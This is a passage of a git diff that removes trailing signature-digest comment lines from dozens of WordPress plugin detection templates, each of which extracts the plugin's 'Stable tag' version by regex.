490a004630440220184ea002543a854f8e5aa84e94e197bbeb2f462aeaecb579a4ce627d50ae14f702201c00a90b11ab03f28b35f01cf8495d5fe9c0ad4aaed8a8ce1c30c2b6f2cd4270:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 89d3678867..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089d26c265747abe5c8e54d7b0b7fd06e2b194f8f773aa87137171426ffc2e5d50220324cd83ea40bbbcf7a6c1a959bf71c11227cf0bf1f8641b6eb660e62374d6d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index c7a35c268d..6ff90e0902 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b94ae44e1f23a7dc9ab88111b2fdf62c2876a11176679ba46a5ddce8445d7240220637030c598e0dc5a49bf112fe4be943157837df6562b70fb5333554ab7cd868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 507fc98384..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022d4f56b2cf9fc8d9f3f71b2db6a8ac352e5eced166ebf06536308188125de0202204bfbed5bcb74dfcbcd6aa88c0b22173167361473ed618ab4af239295cf57d53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index bb8a891ae2..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c96069d4422f6c59ec2d970dd6ba9ebbf126a101927267605ba9aec6e2a8e9e022100f91b4f9343bb625a7dcfe73b9a3b74a1704796d1eead73dae86c5da6fcab5608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index a1a70c194a..27e45e39ca 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022076817860b3a943cb4557986e18070df29105cd9ece34a3fe7cd42ceff56a288d022100faaf7133aaa6059db1bcf427826fca434edaba535d7208303560e34a34fa6c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 8dc19d1e75..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0b23d1c9b852a71c3fb6874d4285fb45225b5b3b7e40dd1f3cb6aebf07acf8e022100f560225ffac4d008f7002a5dc86ba77c1263610640502c567e74993c15ebfdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 6bbfb621bf..d679d8df61 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dab7c8a3e8edca092c28ce13ce7afcca6a9f80c323bac7fde4e84707adadb57022100bda39746e351edd99ec551e36f58e22e94f8e490346ea180451beb2cb4c44558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index ea33903164..8bfe16ca84 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc35209d8804911a484711ce64d05da110be797c1cd2298be7523017b049117402200fb9a38bf2ce3e657dbe48760567241f07200f290ade14952874c9dc94f93c2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 61527c8e76..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202cb66758deb64b2ede6bff23cf88d9f0c35319de304b837caad681ebbb6e422c02203a90bce0058ff1e1b3dd98a34349103544aba1471ad27491551baca0efbb37d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index f5520a724c..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e172924349a58e8099d5cba294b8f25464d48222b20e9c8e3dc7d79a12d07f1f0221009b5b0c79f33b5e0a2e76129201b6f6a6c93af6677d3863843d31735b30f3569a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 9d768bc536..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201443cdf018a54464809f56c85f392e127dfc783f0060569bf48b53cf1f0956210221008575c118382f876c5aec6d19f967b15c1b7ce1e334c05a598f08c2940aee58d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 5f037676d6..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049d0b26602ea09cd9d36b3b1052dc210098096227efdbb753e740e1e42b7c8a802203137509eb0378a7ef21533e118fb802b941b627ef45b1408f048086b9d58afb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index f2a3555f71..67968fb008 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091b13a092f8fe9ff24af8651dbdc6b5835639b94ec77b264a37cef159be20894022100d5ee8dd339f3ecda0c0b95191e6ca26f215062eb57d66f297ab6f56c038bd8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 0e89b1e186..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220750c73ba0e1030dc5b947332f7832701824d198cebe2d3fe59d28071877cb34b0220589734cfd0178acd91cf84f477617477c29c1394e5c51264fb0a44ad3694be5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index fe0b4bfb1c..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008514deb19b498fb61e2ed79d967821bb80535e4c07c1771adcb2d414dcc1b19e022037e95cdb933f9140e3bae8a73fa1a69d79db3412208ae0c23e26f15d3c5fd7d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index bed37ab7b2..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202eceb63dbd039e93074f51620420f43f83e9b9dfdde68b1ecb34f64feae105bc0221009f29fb2e2c0694dfc4ea4923fd29d238c7af4e3d5f6e7bb0a7dff311b71f23c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index a60e0fad48..d22f60a5cd 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004dd9da94e73e59095555824c4d46f567513c49de4f0201673cae81cb72df8a50220016930fbb8d0f9afbc417ca7079de73932ab1b75b9e586ce35c34a946cf346b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index f734426e0d..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a33e307f8707be2fdf0039641ffcb8ebe5034089833cc7217d5187185f9a545a022100b1e60d29347ebd1018ec1de7b1b69badf783c3be6fc97b60711eba087ff96334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 3f9ad2d0ca..2d4f463d97 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc66528bfb1fe5975dbaa4a8d21f877df4fe371bcc7b0cb71bf45e011cbba633022044eb9953f3058e48aafa160694b52fe1627c158d7fc833e6abd31807584876fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 5df37f5ad4..cb67671918 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f727b6750cae69c710e0a2f3e99ecc4948fbeeed4cdb85b011d409c515830184022100949fd402e1056689b15acb7dceafe2036aa56aa66a01299b33128c3177481b78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index b3b0c83a05..cc3eb2481a 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7df9b956824ae8b8f5bc36c3bce379654529330f1b3238186136f5868ec20a4022015dda23588b198f9ee78c1e2787df703a90210a8152f9809d01bbc8a0ba965ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index f580bd14f5..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc0b48aa600660ed42678c3245781bf28734098554327d07d00c4c9916c3cf400221009dcf148e1460cc34f8ba9f43777d1b1dfe64569dad4e69ca5526c989e46dca59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 53c7431a51..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dfc768d413f1d8efd62d6e507af2073d6d7f6b38c4f41ebae68585c6ca9adc13022100b00f2addecbd7d13771dc5de1b1bd97a5ee4cb4f02195283379409babefa099d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 6ce4bbb2e8..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204312e039ca66dc0ba21283dc41b5feea09c84f07ee5886928528faa34a8622b402201065cb7de0799e9132d964eec3b0920f7ba410c7300bb4fd1e282335cfd3c7ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index ce5fe072ff..a33aa7964f 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205936ae9ccf14ae5d326cc9ad6330cf5a9b28de9af023e3dc9d1ec1e3804e5bee022100806e03d59608dfa1249f04e30fc1782ac5792bdb192343d82b292e2e36140f24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 1768c1a277..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e20299679fba8b05b9c0c9d7bc2cc2ac0a5ee33e6908e9c5a04718b8823e2ad02210084ea7941ba8f2ca37a3209694541109e12dccb29047bafb5f684ddda3fecbad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 5827da6639..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024e021fcf40cd61369148bcc9800dbd0042f9054651cd0b7b28d5e1a0c4d49ab0220337a763758279d1895837faa829a9ff4939096f6ef2a840aa8f0c66447e90444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 21250f5787..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab35ac0ba307b659c7f2dbe83648cb151d4a1c19d39ac89f9bf4ffdb28b15dcb0220437480d3f509f214d3f5f1d6d5c897cc08ec48e1b0a38cb3b050db043fd7a57b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index e7148e372b..69c367b8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073cd071cc90245e30ac9cb6b567e717cd8cebd8c756cb3e7fb7e15e5f1979e23022078ae86d086fdc656ca60760c02665f2e556c2c9caa9b68b0013050bdcef67800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 79a10806e5..7776b209df 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220348556cc4640e1f8d83d200d41d22e544c8db9323c10a5fb9fefd041d539dfc302203df8bcce991379ab98156e7f63098f9fa5c4a2f3bf6d2b4063a61371d27de1e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index cf64db58ad..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082162fcc5b2b4c22317dc60d9b830840815c47b0e115003ce89eef40a1b5602a0220455d111b4bd4d49b9e706e2b49f0552d96314b0c1b97cbefbea9aa4d1d8ef8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 2618090f1f..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220319715520813739559e51a9ccaa0d8933be6d74881c195a80867e2c00445238c022100e54550edc212147121352749c5d7074ab1e7f74908dbbf8db3e38761afd4d358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 02778caa78..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220234e0dd65bec536a6f4fb68a6b125840ca04a21d53c727148488f86a9a0bfde602201a35ce8851e577516f29f785f2a1eb773044e8484d1e830dc717b19b96a6378c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index c8e6561e60..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220193a8a7a1f40b26b40b46b789a88b53c27d2249f9d73da2535281e181114542e022100d4eed3410197421ee02f7f19e3dfb04a283f9fa935be7f45bcb70d312b785f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 5970eb0c72..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100feaf89a8dd07f687b4df5b0123ef07fdebe6354eee3ae21e6a2a94fda3ca6ce202202030055b8aa0819d3b7a7433f6d7b0c26aa17ea852f4996f819665d4225ceff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 93006c2f9d..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204777ba0a7f6496837a82483e77fbc90c20ba821bc47c3185d9f23b485fd6380202203ca92b798a14dcc8753f22cf28af73630e1c9860132217c34e5d31b00886a944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 5d8eaf2bfd..9d77ce9155 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e916f5fa00d5c7b045285af6745f0a1e2645b07e7f6a660409141323bbba3727022100e5cdf145956e558b12292f6e6c265f437d35e8aa0528a69d98cf793d160419ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c9c4caaee3..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e05a16bda3acbe2700362ce5034b1b38bdd09e231e49ce3d20d90ea5cd0775f5022100f7a185c3ebcbf323c1c84c0add51781a6e31a10a9d8c2e57cf2a7fe99b730dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index efd45b6b95..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d5a8a334c73f4533d1a00f6afd1c0bfce744cc6fe64ca2f0de974c3856c6f4602210097d56671faf1d2ce2297cf3766d6217a4d91d0509172b4cff349c6972287f967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index f64e06a7ce..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b54354a774acda187b576aa9e07189a99859026d356b0b825fa9c571ae4eb2a022100c0efcadb06b10b2e5fa7f5be57bb6bd753543b86e4209d98090b51610cccc858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 36e503afae..34d36d4349 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100927471834fad2afd1cb51c090bca44fc1bf37599d9ecab3c1de23a2f6fccafcd022100eb5026aee717465309369ce978ded6d7b4f0737c2b26acf80d18b36a7a2fee20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index a8cc6eb298..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099058967b5f8b2d66a12f47bc724eb182e29b743cce3e801ffe7b748183b363b022100a9fc572394d70033432508aded94be4cb33abd4227e161257bc3c6909c3e8491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index bbc85f1345..39b176dcb8 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028b9a38ea8521cd401f1e5c37256d7716417c7fa734bfbd02648adb7462e9efb022100db7de5222c54af8d8b04142580c10126a96f27804d0dc4469f0060d8ca088a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index cf63c64c49..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200993a2f9293b15404037136ff8e65cde3ad870a050a03bd5d966cc0fc58c67b7022100e5ee1514cdcfeda9e202526d424a87f6ceb330f9340ced03f2ec2e0488681b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 34e8bad8fe..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203cab09772ed42c607ed0d8bf7ebf8f71356cebbc8bc57a781f9e01f8ffb17c1a02202ff296830682608221822a4c556dd75d47903fdd707f633422f63a110886b972:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 028112bb4e..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100feffe35f18eef259556f87acbd1efbd062c20b46114c3d7ea96b50e58173ce3b02201ab713ac92a4662e8ff57ae1f4ba3d7486f38cd82054dc5dbfc2927d844354ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 4e52cc28f1..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 